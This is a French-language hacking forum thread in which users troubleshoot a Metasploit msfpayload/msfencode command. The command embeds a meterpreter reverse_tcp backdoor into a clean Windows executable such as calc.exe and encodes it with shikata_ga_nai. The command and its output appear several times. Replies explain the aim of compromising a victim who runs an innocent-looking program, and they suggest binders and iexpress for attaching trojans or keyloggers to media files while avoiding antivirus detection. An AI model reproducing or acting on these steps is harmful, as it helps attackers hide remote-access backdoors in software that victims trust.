LE FORUM DU SITE
Wifi, Backtrack, crack WEP et WPA...
Vous n'êtes pas identifié(e).
Salut j'ai un petit soucis pour suivre ce tuto :lien du tuto
J'ai tester sous bt 5 r1 voila le retour:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R |./msfencode -t exe -x /home/goliatecalc.exe -k -o /home/goliatecalc_pro.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory - /home/goliatecalc.exe
[-] No encoders succeeded.
J'ai le même résultat sous ubuntu 11.04 avec metasploit MAJ par le svn,quelqu'un a une idée pour que je puise encoder un .exe, ou sur mon problème?
Le tuto que tu cites sert à incruster un backdoor dans un .EXE sain, par exemple la calculatrice Windows. Ainsi, quand la victime lance son programme en apparence innocent, elle se retrouve p'wnée jusqu'à l'os...
Le truc, c'est que pour pouvoir incruster ton backdoor dans un EXE sain, il te faut... un EXE sain ! Que tu ne sembles pas avoir puisqu'il te met que ce fichier (l'argument de "-x") n'existe pas
Télécharge la calculatrice Windows, renomme-la en /home/goliatecalc.exe et relance la commande ça devrait passer
Merci de ta réponse, enfaîte en me relisant j'ai vu que je me suis planter dans la syntaxe ><.
Bon sinon j'ai dl un autre log.exe mais la il me sort un erreur que je ne connaît pas:
[email protected]:/home/goliate/pentest/metasploit# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R |./msfencode -t exe -x /home/goliate/calc.exe -k -o /home/goliate/calc_pro.exe -e x86/shikata_ga_nai -c 5
[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)
[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe? [-] No encoders succeeded.
Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)
Je pense plus comme toi bon il ne me reste plus qu'a trouvé un .exe exploitable ^^.
Au passage je voulais savoir si il était possible de faire la même chose avec des fichier autre CAD (.avi .mp3), je voudrais implanter un playload dans un mp3.
Là c'est un binder qu'il te faut, pour "lier" les 2 fichiers, parce que le fichier de base n'est pas exécutable. Je n'en connais pas comme ça mais c'est pas très difficile à trouver. Un bon binder par contre, du genre qui ne fait pas hurler l'antivirus, c'est + rare
Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)
Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)
Super tuto, merci pour le lien antares!
Ca fonctionne sur BT5 R1
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R |./msfencode -t exe -x /home/calc.exe -k -o /home/calc_pro.exe -e x86/shikata_ga_nai -c 5
Et bien la calculatrice Windows comme toi
Et bien la calculatrice Windows comme toi
ok merci pour info tu a update metasploit?
Bon la j'ai tester d'encoder le .exe de wow ( et oui je l'avais sous la main ><) et sous ma ubuntu sa a fonctionné je v voir sous bt.
Merci fuji
Dernière modification par goliate (15-09-2011 22:41:41)
Non j'ai pas fais une mise à jour, et puis d'ailleurs ça n'a rien à voir avec cette m-à -jour puisque Metasploit s'est le faire depuis longtemps, à savoir encoder et intégrer meterpreter dans un autre fichier.exe.
Dernière modification par Fuji (15-09-2011 22:57:44)
Discussion | Réponses | Vues | Dernier message |
---|---|---|---|
probleme alpha networks r36 par jon12
|
5 | 268 | 16-04-2018 20:04:58 par Henri |
Probleme fluxion par matox74
|
1 | 661 | 07-03-2018 20:03:01 par kcdtv |
Problème avec le handshake sur fluxion par err404
|
2 | 1056 | 26-02-2018 17:45:31 par Seska |
Problème de wifi étrange! par lefou66